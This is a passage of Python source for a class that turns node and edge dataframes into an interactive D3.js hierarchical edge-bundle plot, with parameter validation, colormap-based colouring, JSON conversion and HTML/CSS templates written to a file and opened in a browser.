nodeColorScale: The scale to use for colouring the nodes ("linear", "reverse_linear", "log", "reverse_log", "square", "reverse_square", "area", "reverse_area", "volume", "reverse_volume", "ordinal", "reverse_ordinal") (default: 'linear')
node_color_column: The Peak Table column to use for node colours (default: None sets to black)
node_cmap: Set the CMAP colour palette to use for colouring the nodes (default: 'brg')
edgeColorScale: The scale to use for colouring the edges, if edge_color_value is 'pvalue' ("linear", "reverse_linear", "log", "reverse_log", "square", "reverse_square", "area", "reverse_area", "volume", "reverse_volume", "ordinal", "reverse_ordinal") (default: 'linear')
edge_color_value: Set the values to colour the edges by. Either 'sign', 'score or 'pvalue' (default: 'score')
edge_cmap: Set the CMAP colour palette to use for colouring the edges (default: 'brg')
addArcs: Setting to 'True' adds arcs around the edge bundle for each block (default: False)
arcRadiusOffset: Sets the arc radius offset from the inner radius (default: 20)
extendArcAngle: Sets the angle value to add to each end of the arcs (default: 2)
arc_cmap: Set the CMAP colour palette to use for colouring the arcs (default: 'Set1')
help : Print this help text
build : Generates the JavaScript embedded HTML code and writes to a HTML file and opens it in a browser.
buildDashboard : Generates the JavaScript embedded HTML code in a dashboard format, writes to a HTML file and opens it in a browser.
"""
def __init__(self, nodes, edges):
    """Validate and store private deep copies of the node and edge
    dataframes, then initialise all plot parameters to their defaults."""
    self.__nodes = self.__checkNodes(copy.deepcopy(nodes))
    self.__edges = self.__checkEdges(copy.deepcopy(edges))
    self.set_params()
def help(self):
    """Print the class usage text describing all parameters and methods."""
    print(edgeBundle.usage)
def set_params(self, html_file='hEdgeBundle.html', innerRadiusOffset=120, blockSeparation=1, linkFadeOpacity=0.05, mouseOver=True, fontSize=10, backgroundColor='white', foregroundColor='black', node_data=['Name', 'Label'], nodeColorScale='linear', node_color_column='none', node_cmap='brg', edgeColorScale='linear', edge_color_value='score', edge_cmap="brg", addArcs=False, arcRadiusOffset=20, extendArcAngle=2, arc_cmap="Set1"):
    """Validate and store all plot parameters (see the class usage text
    for the meaning of each one). Invalid values print an error and exit.

    BUG FIX: the unpacking of __paramCheck's return previously bound the
    18th value to a stray name `extendArcWidth` while the attribute was
    set from the raw `extendArcAngle` argument; the names now agree.
    """
    (html_file, innerRadiusOffset, blockSeparation, linkFadeOpacity,
     mouseOver, fontSize, backgroundColor, foregroundColor, node_data,
     nodeColorScale, node_color_column, node_cmap, edgeColorScale,
     edge_color_value, edge_cmap, addArcs, arcRadiusOffset,
     extendArcAngle, arc_cmap) = self.__paramCheck(
        html_file, innerRadiusOffset, blockSeparation, linkFadeOpacity,
        mouseOver, fontSize, backgroundColor, foregroundColor, node_data,
        nodeColorScale, node_color_column, node_cmap, edgeColorScale,
        edge_color_value, edge_cmap, addArcs, arcRadiusOffset,
        extendArcAngle, arc_cmap)
    self.__html_file = html_file
    self.__innerRadiusOffset = innerRadiusOffset
    self.__blockSeparation = blockSeparation
    self.__linkFadeOpacity = linkFadeOpacity
    self.__mouseOver = mouseOver
    self.__fontSize = fontSize
    self.__backgroundColor = backgroundColor
    self.__foregroundColor = foregroundColor
    self.__node_data = node_data
    self.__nodeColorScale = nodeColorScale
    self.__node_color_column = node_color_column
    self.__node_cmap = node_cmap
    self.__edgeColorScale = edgeColorScale
    self.__edge_color_value = edge_color_value
    self.__edge_cmap = edge_cmap
    self.__addArcs = addArcs
    self.__arcRadiusOffset = arcRadiusOffset
    self.__extendArcAngle = extendArcAngle
    self.__arc_cmap = arc_cmap
def __process_params(self):
    """Resolve node/block/edge colours and translate Python flags into the
    string values the embedded JavaScript/CSS templates expect."""
    nodes, edges = self.__node_color(self.__nodes, self.__edges)
    nodes, edges = self.__block_color(nodes, edges)
    edges = self.__edge_color(edges)

    # JS booleans are lowercase strings inside the template.
    mouse = "true" if self.__mouseOver else "false"
    arcs = "true" if self.__addArcs else "false"

    # The p-value filter widget only appears when p-values are available.
    if self.__pvalue_matrix_flag:
        pmFlag = "true"
        dispFilterType = "inline-block"
        adj_score_top = "30px"
        dash_adj_score_top = "42px"
    else:
        pmFlag = "false"
        dispFilterType = "none"
        adj_score_top = "0px"
        dash_adj_score_top = "10px"

    bundleJson = self.__df_to_Json(nodes, edges)
    return bundleJson, mouse, arcs, pmFlag, dispFilterType, adj_score_top, dash_adj_score_top
def build(self):
    """Generate the JavaScript-embedded HTML page, write it to the
    configured HTML file and open it in the default web browser.

    Fixes: redundant f.close() inside the `with` block removed; "writen"
    typo in the status message corrected.
    """
    bundleJson, mouse, arcs, pmFlag, dispFilterType, adj_score_top, dash_adj_score_top = self.__process_params()

    js_text = Template(self.__getJS()).substitute(
        {'flareData': bundleJson,
         'innerRadiusOffset': self.__innerRadiusOffset,
         'blockSeparation': self.__blockSeparation,
         'linkFadeOpacity': self.__linkFadeOpacity,
         'fontSize': self.__fontSize,
         'mouseOver': mouse,
         'addArcs': arcs,
         'arcRadiusOffset': self.__arcRadiusOffset,
         'extendArcAngle': self.__extendArcAngle,
         'pmFlag': pmFlag,
         'backgroundColor': self.__backgroundColor})
    css_text = Template(self.__getCSS()).substitute(
        {'backgroundColor': self.__backgroundColor,
         'foregroundColor': self.__foregroundColor,
         'display_filter_type': dispFilterType,
         'adj_score_top': adj_score_top})
    html = Template(self.__getHTML()).substitute(
        {'css_text': css_text, 'js_text': js_text})

    html_file = self.__html_file
    # The context manager closes the file; no explicit close() needed.
    with open(html_file, 'w') as f:
        f.write(html)
    print("HTML written to {}".format(html_file))
    wb.open('file://' + os.path.realpath(html_file))
def buildDashboard(self):
    """Generate the dashboard-format HTML page (edge bundle plus node-data
    panels), write it to "<html_file>_dashboard.html" and open it in the
    default web browser.

    Fixes: redundant f.close() inside the `with` block removed; "writen"
    typo in the status message corrected.
    """
    bundleJson, mouse, arcs, pmFlag, dispFilterType, adj_score_top, dash_adj_score_top = self.__process_params()

    js_text = Template(self.__getJSdashboard()).substitute(
        {'flareData': bundleJson,
         'innerRadiusOffset': self.__innerRadiusOffset,
         'blockSeparation': self.__blockSeparation,
         'linkFadeOpacity': self.__linkFadeOpacity,
         'fontSize': self.__fontSize,
         'mouseOver': mouse,
         'addArcs': arcs,
         'arcRadiusOffset': self.__arcRadiusOffset,
         'extendArcAngle': self.__extendArcAngle,
         'pmFlag': pmFlag,
         'node_data': {'data': self.__node_data},
         'backgroundColor': self.__backgroundColor})
    css_text = Template(self.__getCSSdashboard()).substitute(
        {'backgroundColor': self.__backgroundColor,
         'foregroundColor': self.__foregroundColor,
         'display_filter_type': dispFilterType,
         'adj_score_top': dash_adj_score_top})
    html = Template(self.__getHTMLdashboard()).substitute(
        {'css_text': css_text, 'js_text': js_text})

    # Derive the dashboard file name from the configured HTML file name.
    html_file = self.__html_file.split(".")[0] + "_dashboard.html"
    # The context manager closes the file; no explicit close() needed.
    with open(html_file, 'w') as f:
        f.write(html)
    print("HTML written to {}".format(html_file))
    wb.open('file://' + os.path.realpath(html_file))
def __checkNodes(self, nodes):
    """Ensure `nodes` is a dataframe containing 'Name' and 'Label' columns.

    Prints an error and exits on the first problem; returns the dataframe
    unchanged when it is valid.
    """
    if not isinstance(nodes, pd.DataFrame):
        print("Error: A dataframe was not entered. Please check your data.")
        sys.exit()
    nodes_col = ['Name', 'Label']
    if any(col not in nodes.columns for col in nodes_col):
        print("Error: Nodes dataframe items not valid. Include the following {}.".format(' and '.join(nodes_col)))
        sys.exit()
    return nodes
def __checkEdges(self, edges):
    """Validate the edges dataframe and record whether p-values are present.

    Requires the start/end index, name and label columns plus a 'score'
    column. Sets self.__pvalue_matrix_flag from the presence of 'pvalue'.
    Prints an error and exits on the first problem; returns the dataframe
    unchanged when it is valid.
    """
    if not isinstance(edges, pd.DataFrame):
        print("Error: A dataframe was not entered. Please check your data.")
        sys.exit()
    edges_col = ['start_index', 'start_name', 'start_label', 'end_index', 'end_name', 'end_label', ]
    if any(col not in edges.columns for col in edges_col):
        print("Error: Edges dataframe items not valid. Include the following {} , and either \"Pvalue\" or \"Score\" and \"sign\".".format(', '.join(edges_col)))
        sys.exit()
    if "score" not in edges.columns:
        print("Error: Edges dataframe does not contain \"Score\".")
        sys.exit()
    self.__pvalue_matrix_flag = 'pvalue' in edges.columns
    return edges
def __paramCheck(self, html_file, innerRadiusOffset, blockSeparation, linkFadeOpacity, mouseOver, fontSize, backgroundColor, foregroundColor, node_data, nodeColorScale, node_color_column, node_cmap, edgeColorScale, edge_color_value, edge_cmap, addArcs, arcRadiusOffset, extendArcAngle, arc_cmap):
    """Validate every user-supplied parameter.

    On the first invalid parameter, print an error message and exit the
    process (legacy behaviour). Returns all parameters unchanged.

    BUG FIX: the edge colour-scale error message previously said
    "Node color scale" — corrected to "Edge color scale".
    """
    nodes = self.__nodes
    col_list = list(nodes.columns) + ['none']
    cmap_list = list(matplotlib.cm.cmaps_listed) + list(matplotlib.cm.datad)
    # Include the reversed ('_r') variant of every colormap.
    cmap_list = cmap_list + [cmap + '_r' for cmap in cmap_list]
    scale_options = ["linear", "reverse_linear", "log", "reverse_log", "square", "reverse_square", "area", "reverse_area", "volume", "reverse_volume", "ordinal", "reverse_ordinal"]

    def fail(message):
        # All validation failures print and hard-exit, matching legacy behaviour.
        print(message)
        sys.exit()

    def check_number(value, label):
        # Accept floats and ints (bools pass too, as in the original checks).
        if not isinstance(value, (float, int)):
            fail("Error: {} is not valid. Choose a float or integer value.".format(label))

    def check_cmap(value, label):
        # A CMAP must be a string naming a known matplotlib colormap.
        if not isinstance(value, str):
            fail("Error: {} CMAP is not valid. Choose a string value.".format(label))
        if value not in cmap_list:
            fail("Error: {} CMAP is not valid. Choose one of the following: {}.".format(label, ', '.join(cmap_list)))

    if not isinstance(html_file, str):
        fail("Error: Html file is not valid. Choose a string value.")
    if html_file.split(".")[-1] != "html":
        fail("Error: Html file extension is not 'html'. Please use '.html' extension.")
    check_number(innerRadiusOffset, "Inner radius offset")
    check_number(blockSeparation, "Block separation")
    check_number(linkFadeOpacity, "Link fade opacity")
    if not isinstance(mouseOver, bool):
        fail("Error: Mouse over is not valid. Choose either \"True\" or \"False\".")
    check_number(fontSize, "Font size")
    if not matplotlib.colors.is_color_like(backgroundColor):
        fail("Error: Background colour is not valid. Choose a valid colour value.")
    if not matplotlib.colors.is_color_like(foregroundColor):
        fail("Error: Slider text colour is not valid. Choose a valid colour value.")
    if not isinstance(node_data, list):
        fail("Error: Node data is not valid. Use a list.")
    for node_item in node_data:
        if node_item not in col_list:
            fail("Error: Node data item not valid. Choose one of {}.".format(', '.join(col_list)))
    if "Name" not in node_data:
        fail("Error: Column \"Name\" should be node data. Please correct")
    if "Label" not in node_data:
        fail("Error: Column \"Label\" should be node data. Please correct")
    if nodeColorScale.lower() not in scale_options:
        fail("Error: Node color scale type not valid. Choose either \"linear\", \"reverse_linear\", \"log\", \"reverse_log\", \"square\", \"reverse_square\", \"area\", \"reverse_area\", \"volume\", \"reverse_volume\", \"ordinal\", \"reverse_ordinal\".")
    if node_color_column not in col_list:
        fail("Error: Node color column not valid. Choose one of {}.".format(', '.join(col_list)))
    if node_color_column != 'none':
        node_color_values = np.array(nodes[node_color_column].values)
        if nodeColorScale not in ('ordinal', 'reverse_ordinal'):
            # For non-ordinal scales the column must hold numbers or colours.
            try:
                float(node_color_values[0])
            except ValueError:
                if not matplotlib.colors.is_color_like(node_color_values[0]):
                    fail("Error: Node colour column is not valid. While colorScale is not ordinal or reverse_ordinal, choose a column containing HTML/CSS name, hex code, (R,G,B) tuples, floats or integer values")
    check_cmap(node_cmap, "Node")
    if edgeColorScale.lower() not in scale_options:
        fail("Error: Edge color scale type not valid. Choose either \"linear\", \"reverse_linear\", \"log\", \"reverse_log\", \"square\", \"reverse_square\", \"area\", \"reverse_area\", \"volume\", \"reverse_volume\", \"ordinal\", \"reverse_ordinal\".")
    if edge_color_value.lower() not in ["sign", "pvalue", "score"]:
        fail("Error: Colour scale type not valid. Choose either \"Pvalue\", \"Score\" or \"Sign\".")
    check_cmap(edge_cmap, "Edge")
    if not isinstance(addArcs, bool):
        fail("Error: Add arcs is not valid. Choose either \"True\" or \"False\".")
    check_number(arcRadiusOffset, "Arc radius offset")
    check_number(extendArcAngle, "Extend arc angle")
    check_cmap(arc_cmap, "Arc")
    return html_file, innerRadiusOffset, blockSeparation, linkFadeOpacity, mouseOver, fontSize, backgroundColor, foregroundColor, node_data, nodeColorScale, node_color_column, node_cmap, edgeColorScale, edge_color_value, edge_cmap, addArcs, arcRadiusOffset, extendArcAngle, arc_cmap
def __df_to_flareJson(self, nodes, edges):
    """Convert dataframes into nested JSON as in flare files used for D3.js.

    Returns {"Name": "flare", "children": [parent, ...]} where each parent
    node carries its outgoing edges as "children" entries.

    Fixes: removed the unused `flare = dict()` initialisation and collapsed
    the eight near-identical child/parent dict constructions into helpers.
    Key insertion order in every dict matches the original output exactly
    (id, Name, Label, node_color, link_score, link_sign, [link_pvalue],
    [block, block_color], link_color, extra node columns).
    """
    # Strip bookkeeping columns; what remains (minus 'Name') is extra
    # per-node data copied onto each JSON entry.
    nodeList = list(nodes.columns)
    for meta in ('Idx', 'Label', 'color', 'block', 'block_color'):
        if meta in nodeList:
            nodeList.remove(meta)
    nodeData = nodes[nodeList]
    nodeDataList = list(nodeData.drop(columns=['Name']).columns)

    def node_value(name, col):
        # First value of column `col` for the node called `name`.
        return list(nodeData[nodeData.Name.isin([name])][col])[0]

    def make_child(row, row_list):
        # Build one child entry from an edge row, optional keys included
        # only when the corresponding columns exist on the row.
        child = {"id": row['end_index'], "Name": row['end_name'],
                 "Label": row['end_label'], "node_color": row['end_color'],
                 "link_score": row['score'], "link_sign": row['sign']}
        if 'pvalue' in row_list:
            child["link_pvalue"] = row['pvalue']
        if 'end_block' in row_list:
            child["block"] = row['end_block']
            child["block_color"] = row['end_block_color']
        child["link_color"] = row['color']
        for col in nodeDataList:
            child[col] = node_value(row['end_name'], col)
        return child

    d = {"Name": "flare", "children": []}
    for index, row in edges.iterrows():
        row_list = list(row.index)
        parent_index = row['start_index']
        key_list = [item['id'] for item in d['children']]
        if parent_index not in key_list:
            # First sighting of this parent: create it with its first child.
            parent_dic = {"id": parent_index, "Name": row['start_name'],
                          "Label": row['start_label'],
                          "node_color": row['start_color']}
            if 'start_block' in row_list:
                parent_dic["block"] = row['start_block']
                parent_dic["block_color"] = row['start_block_color']
            for col in nodeDataList:
                parent_dic[col] = node_value(row['start_name'], col)
            parent_dic["children"] = [make_child(row, row_list)]
            d['children'].append(parent_dic)
        else:
            # Parent already present: append another child to it.
            d['children'][key_list.index(parent_index)]['children'].append(
                make_child(row, row_list))
    return d
def __df_to_Json(self, nodes, edges):
    """Flatten the nested flare hierarchy into the flat JSON record list
    consumed by the D3 hierarchical edge-bundle layout.

    Each node becomes one flat dict whose "id" is a flare path of the form
    "<root>#<index>" — or "<root>#<block>#<index>" when the edges carry a
    'start_block' column — plus an "imports" dict mapping the ids of linked
    nodes to their link attributes (link_score, link_sign, link_color and,
    when present, link_pvalue). Links are recorded in both directions
    (parent->child and child->parent).

    Parameters
    ----------
    nodes : pandas.DataFrame
        Node table; must contain 'Name' (extra metadata columns are copied
        verbatim onto every record; 'Idx', 'Label', 'color', 'block',
        'block_color' are treated as bookkeeping and dropped first).
    edges : pandas.DataFrame
        Edge table; only its columns are inspected here (presence of
        'start_block' switches on the block-aware id format).

    Returns
    -------
    list of dict
        All parent records first, followed by every child record.
    """
    flare = self.__df_to_flareJson(nodes, edges);
    # Strip bookkeeping columns so only 'Name' plus user metadata remain.
    nodeList = list(nodes.columns)
    if "Idx" in nodeList:
        nodeList.remove('Idx')
    if "Label" in nodeList:
        nodeList.remove('Label')
    if "color" in nodeList:
        nodeList.remove('color')
    if "block" in nodeList:
        nodeList.remove('block')
    if "block_color" in nodeList:
        nodeList.remove('block_color')
    nodeData = nodes[nodeList]
    # Extra metadata columns copied onto every parent/child record.
    nodeDataList = list(nodeData.drop(columns=['Name']).columns)
    flareString = ""
    bundleJsonArray = []
    completeChildList = []
    for key, value in flare.items():
        if isinstance(value, str):
            # Root name of the flare hierarchy; used as the id prefix.
            flareString = value
        elif isinstance(value, list):
            for idx, val in enumerate(value):
                if "start_block" in edges.columns:
                    # Block-aware parent record: id "<root>#<block>#<index>".
                    dParent = {"id": "", "Name": "", "Label": "", "node_color": "", "block": "", "block_color": ""}
                    for col in nodeDataList:
                        dParent[col] = ""
                    dParent["imports"] = {}
                    parent_index = str(value[idx]['id'])
                    parentBlock = str(value[idx]['block'])
                    parentBlockColor = str(value[idx]['block_color'])
                    flareParentIndex = flareString + "#" + parentBlock + "#" + parent_index
                    dParent["block"] = parentBlock
                    dParent["block_color"] = parentBlockColor
                else:
                    # No block information: id "<root>#<index>".
                    parent_index = str(value[idx]['id'])
                    dParent = {"id": "", "Name": "", "Label": "", "node_color": ""}
                    for col in nodeDataList:
                        dParent[col] = ""
                    dParent["imports"] = {}
                    flareParentIndex = flareString + "#" + parent_index
                parentName = str(value[idx]['Name'])
                parentLabel = str(value[idx]['Label'])
                parentColor = str(value[idx]['node_color'])
                dParent["id"] = flareParentIndex
                dParent["Name"] = parentName
                dParent["Label"] = parentLabel
                dParent["node_color"] = parentColor
                for col in nodeDataList:
                    dParent[col] = str(value[idx][col])
                childList = value[idx]['children']
                for child in childList:
                    child_keys = list(child.keys())
                    link_score = float(child['link_score'])
                    link_sign = float(child['link_sign'])
                    # link_pvalue only exists when the edges carried p-values.
                    if 'link_pvalue' in child_keys:
                        link_pvalue = float(child['link_pvalue'])
                    link_color = str(child['link_color'])
                    if "start_block" in edges.columns:
                        dChild = {"id": "", "Name": "", "Label": "", "node_color": "", "block": "", "block_color": ""}
                        for col in nodeDataList:
                            dChild[col] = ""
                        dChild["imports"] = {}
                        child_index = str(child['id'])
                        childBlock = str(child['block'])
                        childBlockColor = str(child['block_color'])
                        flareChildIndex = flareString + "#" + childBlock + "#" + child_index
                        dChild["block"] = childBlock
                        dChild["block_color"] = childBlockColor
                    else:
                        child_index = str(child['id'])
                        dChild = {"id": "", "Name": "", "Label": "", "node_color": ""}
                        for col in nodeDataList:
                            dChild[col] = ""
                        dChild["imports"] = {}
                        flareChildIndex = flareString + "#" + child_index
                    childName = str(child['Name'])
                    childLabel = str(child['Label'])
                    childColor = str(child['node_color'])
                    # Record the link on the parent side ...
                    if 'link_pvalue' in child_keys:
                        dParent["imports"][flareChildIndex] = {"link_score": link_score, "link_sign": link_sign, "link_pvalue": link_pvalue, "link_color": link_color}
                    else:
                        dParent["imports"][flareChildIndex] = {"link_score": link_score, "link_sign": link_sign, "link_color": link_color}
                    dChild["id"] = flareChildIndex
                    dChild["Name"] = childName
                    dChild["Label"] = childLabel
                    dChild["node_color"] = childColor
                    for col in nodeDataList:
                        dChild[col] = str(child[col])
                    # ... and mirror it on the child side.
                    if 'link_pvalue' in child_keys:
                        dChild["imports"][flareParentIndex] = {"link_score": link_score, "link_sign": link_sign, "link_pvalue": link_pvalue, "link_color": link_color}
                    else:
                        dChild["imports"][flareParentIndex] = {"link_score": link_score, "link_sign": link_sign, "link_color": link_color}
                    completeChildList.append(dChild)
                bundleJsonArray.append(dParent)
    # Parents first, then all accumulated children.
    bundleJsonArray.extend(completeChildList)
    return bundleJsonArray;
def __get_colors(self, colorScale, x, cmap):
    """Map raw values onto colormap entries.

    The values in ``x`` are rescaled to the unit interval with ``transform``
    (using the given ``colorScale`` mode) and then looked up in ``cmap``.
    """
    # Rescale to [0, 1], then index straight into the colormap.
    return cmap(transform(x, colorScale, 0, 1))
def __node_color(self, nodes, edges):
    """Assign a colour to every node and propagate it onto the edges.

    The colour source is ``self.__node_color_column``:
      * 'none' -> every node is coloured black ("#000000");
      * numeric values -> mapped through the node colormap
        (``self.__node_cmap``) using ``self.__nodeColorScale``;
      * colour-like values (names/hex/tuples) -> used as-is;
      * anything else -> only valid with an 'ordinal'/'reverse_ordinal'
        scale; otherwise prints an error and exits.

    Adds a 'color' column to ``nodes`` (mutated in place) and
    'start_color'/'end_color' columns to ``edges`` by merging on
    'start_index'/'end_index'.

    Returns the (nodes, edges) pair.
    """
    colorsHEX = []
    nodeCmap = plt.cm.get_cmap(self.__node_cmap)
    if self.__node_color_column == 'none':
        nodes["color"] = "#000000"
    else:
        node_color_values = nodes[self.__node_color_column].values
        try:
            # Probe the first value: a successful float() means the whole
            # column is treated as numeric (raises ValueError otherwise).
            float(node_color_values[0])
            node_color_values = np.array([float(i) for i in node_color_values])
            colorsRGB = self.__get_colors(self.__nodeColorScale, node_color_values, nodeCmap)[:, :3]
            for rgb in colorsRGB:
                colorsHEX.append(matplotlib.colors.rgb2hex(rgb))
            nodes["color"] = colorsHEX
        except ValueError:
            # Non-numeric column: either already colour-like, or categorical
            # values that require an ordinal colour scale.
            if matplotlib.colors.is_color_like(node_color_values[0]):
                nodes["color"] = node_color_values
            else:
                if ((self.__nodeColorScale != 'ordinal') and (self.__nodeColorScale != 'reverse_ordinal')):
                    print("Error: Node colour column is not valid. While colorScale is not ordinal or reverse_ordinal, choose a column containing HTML/CSS name, hex code, (R,G,B) tuples, floats or integer values.")
                    sys.exit()
                else:
                    colorsRGB = self.__get_colors(self.__nodeColorScale, node_color_values, nodeCmap)[:, :3]
                    for rgb in colorsRGB:
                        colorsHEX.append(matplotlib.colors.rgb2hex(rgb))
                    nodes["color"] = colorsHEX
    # Copy each endpoint's node colour onto the edge rows.
    node_color = nodes['color'].reset_index().rename(columns={"index": "start_index"})
    edges = pd.merge(edges, node_color, how='left', on='start_index').rename(columns={"color": "start_color"})
    node_color = node_color.rename(columns={"start_index": "end_index"})
    edges = pd.merge(edges, node_color, how='left', on='end_index').rename(columns={"color": "end_color"})
    return nodes, edges
def __block_color(self, nodes, edges):
    """Assign a colour to each node's block and propagate it onto the edges.

    Only active when arcs are enabled (``self.__addArcs``) AND the nodes
    carry a 'Block' column. A user-supplied 'block_color' column is
    validated (must be colour-like, else prints an error and exits);
    otherwise colours are generated from the arc colormap
    (``self.__arc_cmap``) with an ordinal scale over the 'Block' values.
    Adds 'start_block_color'/'end_block_color' columns to ``edges`` by
    merging on 'start_index'/'end_index'.

    Returns the (nodes, edges) pair.

    NOTE(review): nesting reconstructed from whitespace-stripped source —
    the merge lines are taken to be inside the addArcs/'Block' guard, since
    'block_color' may not exist otherwise; confirm against upstream.
    """
    colorsHEX = []
    arcCmap = plt.cm.get_cmap(self.__arc_cmap)
    if self.__addArcs and ('Block' in nodes.columns):
        if 'block_color' in nodes.columns:
            # User supplied block colours: validate the first value only.
            block_color_values = nodes['block_color'].values
            if not matplotlib.colors.is_color_like(block_color_values[0]):
                print("Error: Block colour column is not valid. Choose a column containing HTML/CSS name, hex code, or (R,G,B) tuples.")
                sys.exit()
        else:
            # Generate block colours ordinally from the arc colormap.
            colorsRGB = self.__get_colors('ordinal', nodes['Block'].values, arcCmap)[:, :3]
            for rgb in colorsRGB:
                colorsHEX.append(matplotlib.colors.rgb2hex(rgb))
            nodes["block_color"] = colorsHEX
        # Copy each endpoint's block colour onto the edge rows.
        block_color = nodes['block_color'].reset_index().rename(columns={"index": "start_index"})
        edges = pd.merge(edges, block_color, how='left', on='start_index').rename(columns={"block_color": "start_block_color"})
        block_color = block_color.rename(columns={"start_index": "end_index"})
        edges = pd.merge(edges, block_color, how='left', on='end_index').rename(columns={"block_color": "end_block_color"})
    return nodes, edges
def __edge_color(self, edges):
    """Build the edge table used for plotting, with a 'color' column.

    The colour source is ``self.__edge_color_value`` (case-insensitive):
      * "sign"   -> the two extreme colormap entries, chosen per edge by the
                    sign of its 'sign' value (positive -> last entry,
                    otherwise -> first entry);
      * "score"  -> 'score' values mapped through ``self.__edgeColorScale``
                    onto the edge colormap (``self.__edge_cmap``);
      * "pvalue" -> 'pvalue' values mapped the same way; if the dataset has
                    no 'pvalue' column a notice is printed and the score
                    mapping is used instead.

    Fixes vs previous revision: the fallback notice read "Pvalue in not a
    column..." (typo), and the selected-column lists were written out four
    times; they are now built once, preserving the original column order.

    Parameters
    ----------
    edges : pandas.DataFrame
        Must contain the start_*/end_* endpoint columns plus 'score' and
        'sign'; 'start_block'/'end_block' (+ colours) and 'pvalue' are
        optional and included when present.

    Returns
    -------
    pandas.DataFrame
        Copy of the selected edge columns with an added 'color' column
        (no 'color' column is added for an unrecognised colour value,
        matching previous behaviour).
    """
    colorsHEX = []
    edgeCmap = plt.cm.get_cmap(self.__edge_cmap)  # Colour palette for the edges
    # Assemble the output columns once; order matches the original
    # hard-coded lists for every block/pvalue combination.
    has_blocks = "start_block" in edges.columns
    cols = ['start_index', 'start_name', 'start_color', 'start_label']
    if has_blocks:
        cols += ['start_block', 'start_block_color']
    cols += ['end_index', 'end_name', 'end_color', 'end_label']
    if has_blocks:
        cols += ['end_block', 'end_block_color']
    cols += ['score', 'sign']
    if "pvalue" in edges.columns:
        cols += ['pvalue']
    edges_color = edges[cols]
    color_value = self.__edge_color_value.lower()
    if color_value == "pvalue" and "pvalue" not in edges_color.columns:
        # Graceful fallback when p-values were requested but not supplied.
        print("Pvalue is not a column in this dataset. Now choosing score as a color scale.")
        color_value = "score"
    if color_value == "sign":
        # Two-colour scheme: first/last colormap entries by sign of 'sign'.
        for i in range(edgeCmap.N):
            colorsHEX.append(matplotlib.colors.rgb2hex(edgeCmap(i)[:3]))
        signColors = []
        for sign in edges_color['sign'].values:
            if sign > 0:
                signColors.append(colorsHEX[-1])
            else:
                signColors.append(colorsHEX[0])
        edges_color = edges_color.assign(color=pd.Series(signColors, index=edges_color.index))
    elif color_value == "score":
        colorsRGB = self.__get_colors(self.__edgeColorScale, edges_color['score'].values, edgeCmap)[:, :3]
        for rgb in colorsRGB:
            colorsHEX.append(matplotlib.colors.rgb2hex(rgb))
        edges_color = edges_color.assign(color=pd.Series(colorsHEX, index=edges_color.index))
    elif color_value == "pvalue":
        colorsRGB = self.__get_colors(self.__edgeColorScale, edges_color['pvalue'].values, edgeCmap)[:, :3]
        for rgb in colorsRGB:
            colorsHEX.append(matplotlib.colors.rgb2hex(rgb))
        edges_color = edges_color.assign(color=pd.Series(colorsHEX, index=edges_color.index))
    return edges_color
def __getCSS(self):
    """Return the CSS template for the standalone edge-bundle page.

    The string is a string.Template-style body: the $-placeholders
    ($backgroundColor, $foregroundColor, $display_filter_type,
    $adj_score_top) are substituted by the caller before the page is
    written. The rules style the D3 nodes/links, the slider widgets
    (rzslider) and the control panels.
    """
    css_text = '''
body {background-color: $backgroundColor;}
.node {
font: "Helvetica Neue", Helvetica, Arial, sans-serif;
}
.node:hover,
.node--source,
.node--target {
stroke-opacity: 1.0;
font-weight: bold;
}
.node:hover,
.link--source,
.link--target {
stroke-opacity: 1.0;
font-weight: bold;
stroke-width: 4px;
}
.link {
stroke-opacity: 0.4;
fill: none;
pointer-events: none;
}
#edgeBundlePanel {
position: relative;
width: 80%;
height: 80%;
margin: 0 auto;
margin-top: auto;
margin-bottom: auto;
margin-left: auto;
margin-right: auto;
}
#edgeBundle {
margin-top: 50px;
}
.row {
padding-left: 15px;
}
#filterType {
display: $display_filter_type;
position: relative;
top: 0px;
left: 0px;
color: $foregroundColor;
}
#scoreSelect {
display: inline-block;
position: absolute;
top: $adj_score_top;
left: 15px;
color: $foregroundColor;
}
#abs_slider,
#pos_slider,
#neg_slider,
#pvalue_slider,
#tension_slider {
position: relative;
top: 35px;
}
#scoreSelect {
display: block;
}
#save {
position: relative;
top: 3em;
left: 0px;
color: $foregroundColor;
}
.abs_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.pos_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.neg_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.pvalue_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.tension_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.abs_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto;
/* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.pos_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto;
/* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.neg_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto;
/* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.pvalue_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto;
/* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.tension_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto;
/* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.abs_slider.rzslider .rz-pointer:after {
display: none;
}
.pos_slider.rzslider .rz-pointer:after {
display: none;
}
.neg_slider.rzslider .rz-pointer:after {
display: none;
}
.pvalue_slider.rzslider .rz-pointer:after {
display: none;
}
.tension_slider.rzslider .rz-pointer:after {
display: none;
}
h3, text {
font-family: sans-serif;
-webkit-touch-callout: none; /* iOS Safari */
-webkit-user-select: none; /* Safari */
-khtml-user-select: none; /* Konqueror HTML */
-moz-user-select: none; /* Firefox */
-ms-user-select: none; /* Internet Explorer/Edge */
user-select: none; /* Non-prefixed version, currently supported by Chrome and Opera */
}
'''
    return css_text
def __getCSSdashboard(self):
    """Return the CSS template for the dashboard variant of the plot.

    Same $-placeholder scheme as the standalone template
    ($backgroundColor, $foregroundColor, $display_filter_type,
    $adj_score_top) but with dashboard-specific sizing (65% panel),
    highlighted link--source/--target rules and striped table cells.
    """
    css_text = '''
body {background-color: $backgroundColor;}
.node {
font: "Helvetica Neue", Helvetica, Arial, sans-serif;
}
